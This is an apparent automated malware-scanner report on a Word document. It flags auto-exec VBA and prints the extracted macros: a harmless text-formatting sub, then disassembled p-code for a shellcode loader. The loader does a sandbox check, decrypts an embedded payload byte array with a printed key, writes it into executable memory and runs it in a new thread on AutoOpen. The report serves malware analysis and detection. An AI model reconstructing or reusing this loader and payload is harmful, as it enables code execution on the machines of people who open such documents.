MALICIOUS
182
Risk Score
Heuristics 6
-
Raw OLE macro native-memory callback shellcode loader critical OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADERRaw OLE/VBA project text contains an auto-exec entry plus native memory allocation, process-memory write/copy, and callback/timer execution APIs. This catches source-stomped or partially recovered VBA loaders where the extracted macro source omits the auto-run entry, but the compiled/source project bytes still expose the in-memory shellcode loader triad.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
VBA native-memory callback shellcode loader critical OLE_VBA_NATIVE_MEMORY_CALLBACK_LOADERVBA auto-exec macro declares or calls native memory allocation, process-memory write/copy, and callback/timer execution APIs. This is the in-memory shellcode loader pattern: allocate writable memory, copy decoded payload bytes into it, then transfer control through a callback such as CreateTimerQueueTimer. Benign document automation does not combine these primitives.Matched line in script
' Line #1: ' FuncDefn (Function VirtualAlloc(ByVal lpAddress As Ptr) As Ptr) ' Line #2: -
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18827 bytes |
SHA-256: 8b4409e0918b139b29e6c354c93c05df45768219a840cbddb124c9507f3a8f3d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Sub FormatSelectedText()
' Check if the user has selected any text
If Selection.Type = wdSelectionIP Then
MsgBox "Please select some text first."
Exit Sub
End If
' Apply formatting to the selected text
With Selection.Font
.Name = "Arial"
.Size = 14
.Bold = True
.Italic = False
.Color = wdColorBlue
End With
MsgBox "Selected text has been formatted."
End Sub
Sub FormatSelectedText()
' Check if the user has selected any text
If Selection.Type = wdSelectionIP Then
MsgBox "Please select some text first."
Exit Sub
End If
' Apply formatting to the selected text
With Selection.Font
.Name = "Arial"
.Size = 14
.Bold = True
.Italic = False
.Color = wdColorBlue
End With
MsgBox "Selected text has been formatted."
End Sub
' Processing file: /opt/analyzer/scan_staging/8e1a909dbf4a4c1897cf4f8aebbc0d0b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1112 bytes
' Macros/VBA/NewMacros - 27215 bytes
' Line #0:
' FuncDefn (Function CreateThread(ByVal SecurityAttributes As Long) As Ptr)
' Line #1:
' FuncDefn (Function VirtualAlloc(ByVal lpAddress As Ptr) As Ptr)
' Line #2:
' FuncDefn (Function RtlMoveMemory(ByVal lDestination As Ptr) As Long)
' Line #3:
' FuncDefn (Function FlsAlloc(ByVal destructorCallback As Ptr) As Long)
' Line #4:
' FuncDefn (Function FlsSetValue(ByVal dwFlsIndex As Long) As Long)
' Line #5:
' FuncDefn (Function FlsGetValue(ByVal dwFlsIndex As Long) As Long)
' Line #6:
' Line #7:
' Line #8:
' Line #9:
' FuncDefn (Function MyMacro())
' Line #10:
' Dim
' VarDefn buf (As Variant)
' Line #11:
' Dim
' VarDefn addr (As Ptr)
' Line #12:
' Dim
' VarDefn counter (As Long)
' Line #13:
' Dim
' VarDefn data (As Long)
' Line #14:
' Dim
' VarDefn res_move (As Long)
' Line #15:
' Dim
' VarDefn res_thread (As Ptr)
' Line #16:
' Dim
' VarDefn ciphered_byte (As Long)
' Line #17:
' Dim
' VarDefn decryption_key (As Variant)
' Line #18:
' Dim
' VarDefn key_byte (As Long)
' Line #19:
' Dim
' VarDefn keyLength (As Long)
' Line #20:
' Dim
' VarDefn fls_alloc_result (As Long)
' Line #21:
' Dim
' VarDefn fls_set_value_result (As Long)
' Line #22:
' Dim
' VarDefn fls_read_value (As Long)
' Line #23:
' Line #24:
' LitDI2 0x0000
' ArgsLd FlsAlloc 0x0001
' St fls_alloc_result
' Line #25:
' Ld fls_alloc_result
' LitDI2 0x0539
' ArgsLd FlsSetValue 0x0002
' St fls_set_value_result
' Line #26:
' Ld fls_alloc_result
' ArgsLd FlsGetValue 0x0001
' St fls_read_value
' Line #27:
' Ld fls_read_value
' LitDI2 0x0539
' Eq
' IfBlock
' Line #28:
' ElseBlock
' Line #29:
' ExitFunc
' Line #30:
' EndIfBlock
' Line #31:
' Line #32:
' Line #33:
' Line #34:
' Line #35:
' LineCont 0x003C 68 00 00 00 CC 00 00 00 30 01 00 00 94 01 00 00 F8 01 00 00 5C 02 00 00 C0 02 00 00 24 03 00 00 88 03 00 00 EC 03 00 00 50 04 00 00 B4 04 00 00 18 05 00 00 7C 05 00 00 E0 05 00 00
' LitDI2 0x00FB
' LitDI2 0x0026
' LitDI2 0x00A6
' LitDI2 0x0039
' LitDI2 0x009A
' LitDI2 0x0017
' LitDI2 0x0089
' LitDI2 0x00EE
' LitDI2 0x00F2
' LitDI2 0x00FF
' LitDI2 0x00A7
' LitDI2 0x0050
' LitDI2 0x001F
' LitDI2 0x0073
' LitDI2 0x00A7
' LitDI2 0x00F2
' LitDI2 0x0060
' LitDI2 0x008F
' LitDI2 0x0053
' LitDI2 0x003A
' LitDI2 0x008A
' LitDI2 0x00B8
' LitDI2 0x005F
' LitDI2 0x0026
' LitDI2 0x00AE
' LitDI2 0x00A7
' LitDI2 0x00C2
' LitDI2 0x0080
' LitDI2 0x0005
' LitDI2 0x0079
' LitDI2 0x0044
' LitDI2 0x001F
' LitDI2 0x00BC
' LitDI2 0x0047
' LitDI2 0x00ED
' LitDI2 0x00DA
' LitDI2 0x009F
' LitDI2 0x00F4
' LitDI2 0x0077
' LitDI2 0x0048
' LitDI2 0x0060
' LitDI2 0x0042
' LitDI2 0x004C
' LitDI2 0x0097
' LitDI2 0x00C8
' LitDI2 0x0026
' LitDI2 0x0054
' LitDI2 0x0015
' LitDI2 0x0056
' LitDI2 0x006B
' LitDI2 0x001E
' LitDI2 0x006A
' LitDI2 0x00F4
' LitDI2 0x002B
' LitDI2 0x0086
' LitDI2 0x0040
' LitDI2 0x009F
' LitDI2 0x00EC
' LitDI2 0x0062
' LitDI2 0x00EB
' LitDI2 0x0030
' LitDI2 0x007E
' LitDI2 0x00D0
' LitDI2 0x00DF
' LitDI2 0x0051
' LitDI2 0x00A7
' LitDI2 0x0050
' LitDI2 0x0026
' LitDI2 0x00AE
' LitDI2 0x00A7
' LitDI2 0x00CA
' LitDI2 0x00BA
' LitDI2 0x00FF
' LitDI2 0x002A
' LitDI2 0x003A
' LitDI2 0x0000
' LitDI2 0x0036
' LitDI2 0x0065
' LitDI2 0x005F
' LitDI2 0x009B
' LitDI2 0x006D
' LitDI2 0x00B5
' LitDI2 0x0031
' LitDI2 0x00CC
' LitDI2 0x0073
' LitDI2 0x0064
' LitDI2 0x00FF
' LitDI2 0x0066
' LitDI2 0x00FF
' LitDI2 0x0069
' LitDI2 0x00A3
' LitDI2 0x00DD
' LitDI2 0x00AA
' LitDI2 0x002F
' LitDI2 0x00BD
' LitDI2 0x0036
' LitDI2 0x0077
' LitDI2 0x00BF
' LitDI2 0x00DA
' LitDI2 0x0066
' LitDI2 0x0026
' LitDI2 0x0024
' LitDI2 0x0025
' LitDI2 0x00EE
' LitDI2 0x00BA
' LitDI2 0x00FD
' LitDI2 0x000E
' LitDI2 0x007D
' LitDI2 0x0047
' LitDI2 0x007E
' LitDI2 0x004F
' LitDI2 0x0027
' LitDI2 0x0024
' LitDI2 0x0025
' LitDI2 0x008D
' LitDI2 0x0085
' LitDI2 0x000A
' LitDI2 0x001F
' LitDI2 0x00BB
' LitDI2 0x0047
' LitDI2 0x0065
' LitDI2 0x00C8
' LitDI2 0x001F
' LitDI2 0x00AE
' LitDI2 0x0089
' LitDI2 0x0032
' LitDI2 0x0077
' LitDI2 0x00BE
' LitDI2 0x00C4
' LitDI2 0x003A
' LitDI2 0x0030
' LitDI2 0x0026
' LitDI2 0x0040
' LitDI2 0x009F
' LitDI2 0x00EC
' LitDI2 0x0062
' LitDI2 0x0056
' LitDI2 0x0070
' LitDI2 0x00BE
' LitDI2 0x00AF
' LitDI2 0x002A
' LitDI2 0x00DF
' LitDI2 0x00DB
' LitDI2 0x00F0
' LitDI2 0x002A
' LitDI2 0x0026
' LitDI2 0x00A1
' LitDI2 0x00CE
' LitDI2 0x0037
' LitDI2 0x0002
' LitDI2 0x0027
' LitDI2 0x00C3
' LitDI2 0x0074
' LitDI2 0x003E
' LitDI2 0x0057
' LitDI2 0x0022
' LitDI2 0x00AE
' LitDI2 0x0095
' LitDI2 0x00CE
' LitDI2 0x0078
' LitDI2 0x00BE
' LitDI2 0x00BE
' LitDI2 0x0058
' LitDI2 0x0040
' LitDI2 0x00F1
' LitDI2 0x000B
' LitDI2 0x0026
' LitDI2 0x0067
' LitDI2 0x00E0
' LitDI2 0x00EA
' LitDI2 0x004B
' LitDI2 0x0006
' LitDI2 0x00EF
' LitDI2 0x00C2
' LitDI2 0x0040
' LitDI2 0x00F1
' LitDI2 0x0003
' LitDI2 0x0066
' LitDI2 0x0064
' LitDI2 0x00AD
' LitDI2 0x00F2
' LitDI2 0x0030
' LitDI2 0x008D
' LitDI2 0x002F
' LitDI2 0x004A
' LitDI2 0x005D
' LitDI2 0x00BF
' LitDI2 0x0059
' LitDI2 0x001F
' LitDI2 0x007B
' LitDI2 0x0096
' LitDI2 0x0003
' LitDI2 0x0070
' LitDI2 0x0017
' LitDI2 0x0036
' LitDI2 0x0075
' LitDI2 0x00EB
' LitDI2 0x0086
' LitDI2 0x0040
' LitDI2 0x0030
' LitDI2 0x0022
' LitDI2 0x0035
' LitDI2 0x0002
' LitDI2 0x0070
' LitDI2 0x0016
' LitDI2 0x0048
' LitDI2 0x003A
' LitDI2 0x008A
' LitDI2 0x0078
' LitDI2 0x00E8
' LitDI2 0x0029
' LitDI2 0x0022
' LitDI2 0x0054
' LitDI2 0x00A9
' LitDI2 0x008C
' LitDI2 0x0005
' LitDI2 0x001F
' LitDI2 0x00CD
' LitDI2 0x0052
' LitDI2 0x00AF
' LitDI2 0x00BD
' LitDI2 0x0055
' LitDI2 0x008C
' LitDI2 0x00C3
' LitDI2 0x0013
' LitDI2 0x009D
' LitDI2 0x0022
' LitDI2 0x0062
' LitDI2 0x00F2
' LitDI2 0x0040
' LitDI2 0x00BC
' LitDI2 0x0047
' LitDI2 0x0067
' LitDI2 0x0004
' LitDI2 0x009E
' LitDI2 0x0071
' LitDI2 0x00F1
' LitDI2 0x0009
' LitDI2 0x0065
' LitDI2 0x0018
' LitDI2 0x0006
' LitDI2 0x0065
' LitDI2 0x00D4
' LitDI2 0x0031
' LitDI2 0x0076
' LitDI2 0x003D
' LitDI2 0x001A
' LitDI2 0x002F
' LitDI2 0x00BD
' LitDI2 0x00EE
' LitDI2 0x003F
' LitDI2 0x006E
' LitDI2 0x00E0
' LitDI2 0x0068
' LitDI2 0x004A
' LitDI2 0x008F
' LitDI2 0x00B6
' LitDI2 0x00D9
' LitDI2 0x0064
' LitDI2 0x00EB
' LitDI2 0x001E
' LitDI2 0x0012
' LitDI2 0x0027
' LitDI2 0x00BD
' LitDI2 0x0068
' LitDI2 0x004C
' LitDI2 0x0087
' LitDI2 0x00C4
' LitDI2 0x0021
' LitDI2 0x00A2
' LitDI2 0x00DD
' LitDI2 0x003C
' LitDI2 0x0046
' LitDI2 0x001F
' LitDI2 0x0097
' LitDI2 0x002F
' LitDI2 0x000C
' LitDI2 0x0053
' LitDI2 0x0090
' LitDI2 0x00CA
' LitDI2 0x0086
' LitDI2 0x0026
' LitDI2 0x005C
' LitDI2 0x0028
' LitDI2 0x0033
' LitDI2 0x00A1
' LitDI2 0x001F
' LitDI2 0x0056
' LitDI2 0x0059
' LitDI2 0x0089
' LitDI2 0x00D3
' LitDI2 0x004F
' LitDI2 0x00FE
' LitDI2 0x005E
' LitDI2 0x0062
' LitDI2 0x006B
' LitDI2 0x00CB
' LitDI2 0x0056
' LitDI2 0x0043
' LitDI2 0x0085
' LitDI2 0x00A0
' LitDI2 0x0013
' LitDI2 0x00A3
' LitDI2 0x00EC
' LitDI2 0x0023
' LitDI2 0x0025
' LitDI2 0x0036
' LitDI2 0x0094
' LitDI2 0x0032
' LitDI2 0x0014
' LitDI2 0x0043
' LitDI2 0x007D
' LitDI2 0x00F5
' LitDI2 0x0077
' LitDI2 0x0011
' LitDI2 0x003B
' LitDI2 0x003E
' LitDI2 0x002B
' LitDI2 0x0086
' LitDI2 0x006B
' LitDI2 0x0047
' LitDI2 0x008E
' LitDI2 0x00BA
' LitDI2 0x00CA
' LitDI2 0x0076
' LitDI2 0x0022
' LitDI2 0x0051
' LitDI2 0x005D
' LitDI2 0x006E
' LitDI2 0x008F
' LitDI2 0x001F
' LitDI2 0x0021
' LitDI2 0x008B
' LitDI2 0x00C7
' LitDI2 0x0019
' LitDI2 0x009C
' LitDI2 0x0022
' LitDI2 0x001D
' LitDI2 0x0023
' LitDI2 0x0032
' LitDI2 0x0097
' LitDI2 0x002D
' LitDI2 0x000E
' LitDI2 0x0051
' LitDI2 0x0085
' LitDI2 0x00D8
' LitDI2 0x005F
' LitDI2 0x00DD
' LitDI2 0x0041
' LitDI2 0x0053
' LitDI2 0x0065
' LitDI2 0x00C7
' LitDI2 0x0071
' LitDI2 0x0047
' LitDI2 0x0052
' LitDI2 0x008A
' LitDI2 0x00DD
' LitDI2 0x0066
' LitDI2 0x00EB
' LitDI2 0x0021
' LitDI2 0x0028
' LitDI2 0x00FF
' LitDI2 0x00BF
' LitDI2 0x0052
' LitDI2 0x0038
' LitDI2 0x0070
' LitDI2 0x0086
' LitDI2 0x006A
' LitDI2 0x007C
' LitDI2 0x00EE
' LitDI2 0x00B7
' LitDI2 0x0045
' LitDI2 0x0052
' LitDI2 0x00AF
' LitDI2 0x00B9
' LitDI2 0x0018
' LitDI2 0x0079
' LitDI2 0x00CE
' LitDI2 0x0051
' LitDI2 0x002F
' LitDI2 0x00BD
' LitDI2 0x00EE
' LitDI2 0x00F2
' LitDI2 0x00FE
' LitDI2 0x003B
' LitDI2 0x00E7
' LitDI2 0x00EE
' LitDI2 0x0023
' LitDI2 0x0055
' LitDI2 0x00AA
' LitDI2 0x0060
' LitDI2 0x00F6
' LitDI2 0x0020
' LitDI2 0x0020
' LitDI2 0x0030
' LitDI2 0x009C
' LitDI2 0x0037
' LitDI2 0x000C
' LitDI2 0x0054
' LitDI2 0x0087
' LitDI2 0x00DC
' LitDI2 0x005D
' LitDI2 0x00EF
' LitDI2 0x0021
' LitDI2 0x0024
' LitDI2 0x00FF
' LitDI2 0x00C0
' LitDI2 0x0047
' LitDI2 0x0067
' LitDI2 0x00E4
' LitDI2 0x009E
' LitDI2 0x0071
' LitDI2 0x00EF
' LitDI2 0x0078
' LitDI2 0x00EF
' LitDI2 0x00F2
' LitDI2 0x00FF
' LitDI2 0x00B3
' LitDI2 0x0030
' LitDI2 0x00A7
' LitDI2 0x0076
' LitDI2 0x00A8
' LitDI2 0x0014
' LitDI2 0x0032
' LitDI2 0x0010
' LitDI2 0x0037
' LitDI2 0x00AC
' LitDI2 0x0056
' LitDI2 0x00EF
' LitDI2 0x009E
' LitDI2 0x00A4
' LitDI2 0x0023
' LitDI2 0x0055
' LitDI2 0x00AA
' LitDI2 0x002F
' LitDI2 0x00BC
' LitDI2 0x00C3
' LitDI2 0x00DA
' LitDI2 0x0054
' LitDI2 0x0066
' LitDI2 0x00FF
' LitDI2 0x00DE
' LitDI2 0x0052
' LitDI2 0x00C1
' LitDI2 0x00F2
' LitDI2 0x00A1
' LitDI2 0x0004
' LitDI2 0x0068
' LitDI2 0x0041
' LitDI2 0x006E
' LitDI2 0x00AA
' LitDI2 0x005E
' LitDI2 0x0057
' LitDI2 0x0094
' LitDI2 0x008B
' LitDI2 0x00EE
' LitDI2 0x007B
' LitDI2 0x0030
' LitDI2 0x003D
' LitDI2 0x0022
' LitDI2 0x0040
' LitDI2 0x00AA
' LitDI2 0x0063
' LitDI2 0x0056
' LitDI2 0x0074
' LitDI2 0x008E
' LitDI2 0x0024
' LitDI2 0x0091
' LitDI2 0x0034
' LitDI2 0x005E
' LitDI2 0x0023
' LitDI2 0x004D
' LitDI2 0x00BD
' LitDI2 0x0048
' LitDI2 0x0045
' LitDI2 0x0059
' LitDI2 0x00A6
' LitDI2 0x00E0
' LitDI2 0x0074
' LitDI2 0x002C
' LitDI2 0x0039
' LitDI2 0x0034
' LitDI2 0x0053
' LitDI2 0x00B6
' LitDI2 0x006C
' LitDI2 0x0013
' LitDI2 0x0053
' LitDI2 0x00BF
' LitDI2 0x0016
' LitDI2 0x0086
' LitDI2 0x002E
' LitDI2 0x0051
' LitDI2 0x0046
' LitDI2 0x0066
' LitDI2 0x00A7
' LitDI2 0x0069
' LitDI2 0x0016
' LitDI2 0x0099
' LitDI2 0x00B7
' LitDI2 0x00F6
' LitDI2 0x0079
' LitDI2 0x000B
' LitDI2 0x0043
' LitDI2 0x0024
' LitDI2 0x006F
' LitDI2 0x00C9
' LitDI2 0x0066
' LitDI2 0x0025
' LitDI2 0x0099
' LitDI2 0x008C
' LitDI2 0x00FC
' LitDI2 0x0086
' LitDI2 0x0009
' LitDI2 0x005F
' LitDI2 0x0039
' LitDI2 0x0073
' LitDI2 0x00DD
' LitDI2 0x0060
' LitDI2 0x0017
' LitDI2 0x0074
' LitDI2 0x00C8
' LitDI2 0x00FD
' LitDI2 0x0089
' LitDI2 0x001C
' LitDI2 0x0043
' LitDI2 0x0055
' LitDI2 0x00FF
' LitDI2 0x00AE
' LitDI2 0x0088
' LitDI2 0x009F
' LitDI2 0x0076
' LitDI2 0x00AF
' LitDI2 0x00EB
' LitDI2 0x0087
' LitDI2 0x000A
' LitDI2 0x001F
' LitDI2 0x00BB
' LitDI2 0x0052
' LitDI2 0x00AE
' LitDI2 0x00B7
' LitDI2 0x00DE
' LitDI2 0x0055
' LitDI2 0x00FD
' LitDI2 0x002E
' LitDI2 0x002F
' LitDI2 0x00BD
' LitDI2 0x00EE
' LitDI2 0x00F2
' LitDI2 0x004F
' LitDI2 0x00B9
' LitDI2 0x0052
' LitDI2 0x0027
' LitDI2 0x00EA
' LitDI2 0x0017
' LitDI2 0x0095
' LitDI2 0x0084
' LitDI2 0x00EB
' LitDI2 0x0029
' LitDI2 0x00F1
' LitDI2 0x00D4
' LitDI2 0x00AE
' LitDI2 0x0088
' LitDI2 0x00A4
' LitDI2 0x008D
' LitDI2 0x005F
' LitDI2 0x0009
' LitDI2 0x0077
' LitDI2 0x0046
' LitDI2 0x00DF
' LitDI2 0x005C
' LitDI2 0x001E
' LitDI2 0x00C0
' LitDI2 0x0051
' LitDI2 0x0046
' LitDI2 0x00A3
' LitDI2 0x0088
' LitDI2 0x00AA
' LitDI2 0x002F
' LitDI2 0x0006
' LitDI2 0x0077
' LitDI2 0x00D2
' LitDI2 0x0069
' LitDI2 0x006A
' LitDI2 0x0040
' LitDI2 0x0037
' LitDI2 0x006C
' LitDI2 0x000F
' LitDI2 0x001F
' LitDI2 0x0075
' LitDI2 0x005B
' LitDI2 0x0074
' LitDI2 0x00F2
' LitDI2 0x00FF
' LitDI2 0x0066
' LitDI2 0x00FF
' LitDI2 0x00DD
' LitDI2 0x00F8
' LitDI2 0x00A2
' LitDI2 0x00DB
' LitDI2 0x00EF
' LitDI2 0x0010
' LitDI2 0x0048
' LitDI2 0x003A
' LitDI2 0x0088
' LitDI2 0x0057
' LitDI2 0x004C
' LitDI2 0x000F
' LitDI2 0x00EC
' LitDI2 0x00A2
' LitDI2 0x00DB
' LitDI2 0x00F8
' LitDI2 0x0010
' LitDI2 0x0041
' LitDI2 0x003B
' LitDI2 0x00C6
' LitDI2 0x0028
' LitDI2 0x002C
' LitDI2 0x00E4
' LitDI2 0x003B
' LitDI2 0x00D0
' LitDI2 0x00A9
' LitDI2 0x0004
' LitDI2 0x0042
' LitDI2 0x00AE
' LitDI2 0x0067
' LitDI2 0x001E
' LitDI2 0x00AE
' LitDI2 0x00C6
' LitDI2 0x009F
' LitDI2 0x00AB
' LitDI2 0x0068
' LitDI2 0x00AA
' LitDI2 0x002F
' LitDI2 0x0006
' LitDI2 0x00A8
' LitDI2 0x0036
' LitDI2 0x00EF
' LitDI2 0x009B
' LitDI2 0x00DF
' LitDI2 0x00DE
' LitDI2 0x0023
' LitDI2 0x0055
' LitDI2 0x00AA
' LitDI2 0x002E
' LitDI2 0x0092
' LitDI2 0x0036
' LitDI2 0x00F1
' LitDI2 0x00CE
' LitDI2 0x00DA
' LitDI2 0x0001
' LitDI2 0x00C9
' LitDI2 0x00CD
' LitDI2 0x003D
' LitDI2 0x00FF
' LitDI2 0x002F
' LitDI2 0x00BD
' LitDI2 0x00EE
' LitDI2 0x0045
' LitDI2 0x0058
' LitDI2 0x00D0
' LitDI2 0x003F
' LitDI2 0x0038
' LitDI2 0x006C
' LitDI2 0x00DE
' LitDI2 0x007B
' LitDI2 0x00F0
' LitDI2 0x009F
' LitDI2 0x00FE
' LitDI2 0x003B
' LitDI2 0x00C6
' LitDI2 0x0026
' LitDI2 0x00FF
' LitDI2 0x00EE
' LitDI2 0x0023
' LitDI2 0x0055
' LitDI2 0x00F3
' LitDI2 0x00E9
' LitDI2 0x0015
' LitDI2 0x0092
' LitDI2 0x0045
' LitDI2 0x00E4
' LitDI2 0x0066
' LitDI2 0x00FF
' LitDI2 0x00DE
' LitDI2 0x0023
' LitDI2 0x0054
' LitDI2 0x007F
' LitDI2 0x0077
' LitDI2 0x0050
' LitDI2 0x0041
' LitDI2 0x0045
' LitDI2 0x0047
' LitDI2 0x00EF
' LitDI2 0x00E6
' LitDI2 0x0026
' LitDI2 0x00AC
' LitDI2 0x0046
' LitDI2 0x00F2
' LitDI2 0x00B8
' LitDI2 0x0097
' LitDI2 0x0037
' LitDI2 0x00B9
' LitDI2 0x00BF
' LitDI2 0x0066
' LitDI2 0x001F
' LitDI2 0x00DE
' LitDI2 0x0023
' LitDI2 0x009E
' LitDI2 0x0033
' LitDI2 0x0028
' LitDI2 0x0006
' LitDI2 0x00A8
' LitDI2 0x0004
' LitDI2 0x0095
' LitDI2 0x00EF
' LitDI2 0x00E1
' LitDI2 0x00DE
' LitDI2 0x0023
' LitDI2 0x0055
' LitDI2 0x00AA
' LitDI2 0x002E
' LitDI2 0x0092
' LitDI2 0x0036
' LitDI2 0x0075
' LitDI2 0x00C3
' LitDI2 0x0086
' LitDI2 0x0084
' LitDI2 0x009E
' LitDI2 0x0097
' LitDI2 0x0007
' LitDI2 0x0010
' LitDI2 0x00BA
' LitDI2 0x00C4
' LitDI2 0x0036
' LitDI2 0x00F3
' LitDI2 0x00C2
' LitDI2 0x00EB
' LitDI2 0x00BF
' LitDI2 0x0053
' LitDI2 0x00F5
' LitDI2 0x00AD
' LitDI2 0x006D
' LitDI2 0x0087
' LitDI2 0x0027
' LitDI2 0x00EE
' LitDI2 0x004B
' LitDI2 0x0048
' LitDI2 0x002D
' LitDI2 0x00C1
' LitDI2 0x00CE
' LitDI2 0x00D8
' LitDI2 0x00F7
' LitDI2 0x0000
' LitDI2 0x002E
' LitDI2 0x0092
' ArgsArray Array 0x02F3
' St buf
' Line #36:
' Line #37:
' LitHI2 0x00FF
' LitHI2 0x00DE
' LitHI2 0x0023
' LitHI2 0x0055
' LitHI2 0x00AA
' LitHI2 0x002F
' LitHI2 0x00BD
' LitHI2 0x00EE
' LitHI2 0x00F2
' LitHI2 0x00FF
' LitHI2 0x0066
' ArgsArray Array 0x000B
' St decryption_key
' Line #38:
' Ld decryption_key
' FnUBound 0x0000
' Ld decryption_key
' FnLBound 0x0000
' Sub
' LitDI2 0x0001
' Add
' St keyLength
' Line #39:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0000
' Ld buf
' FnUBound 0x0000
' For
' Line #40:
' Ld i
' ArgsLd buf 0x0001
' St ciphered_byte
' Line #41:
' Ld i
' Ld keyLength
' Mod
' ArgsLd decryption_key 0x0001
' St key_byte
' Line #42:
' Ld ciphered_byte
' Ld key_byte
' Sub
' LitDI2 0x0100
' Add
' Paren
' LitDI2 0x0100
' Mod
' Ld i
' ArgsSt buf 0x0001
' Line #43:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #44:
' LitDI2 0x0000
' Ld buf
' FnUBound 0x0000
' LitHI2 0x3000
' LitHI2 0x0040
' ArgsLd VirtualAlloc 0x0004
' St addr
' Line #45:
' StartForVariable
' Ld counter
' EndForVariable
' Ld buf
' FnLBound 0x0000
' Ld buf
' FnUBound 0x0000
' For
' Line #46:
' Ld counter
' ArgsLd buf 0x0001
' St data
' Line #47:
' Ld addr
' Ld counter
' Add
' Ld data
' LitDI2 0x0001
' ArgsLd RtlMoveMemory 0x0003
' St res_move
' Line #48:
' StartForVariable
' Ld counter
' EndForVariable
' NextVar
' Line #49:
' Line #50:
' LitDI2 0x0000
' LitDI2 0x0000
' Ld addr
' LitDI2 0x0000
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsLd CreateThread 0x0006
' St res_thread
' Line #51:
' Line #52:
' EndFunc
' Line #53:
' Line #54:
' FuncDefn (Sub AutoOpen())
' Line #55:
' ArgsCall MyMacro 0x0000
' Line #56:
' EndSub
' Line #57:
' Line #58:
' Line #59:
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.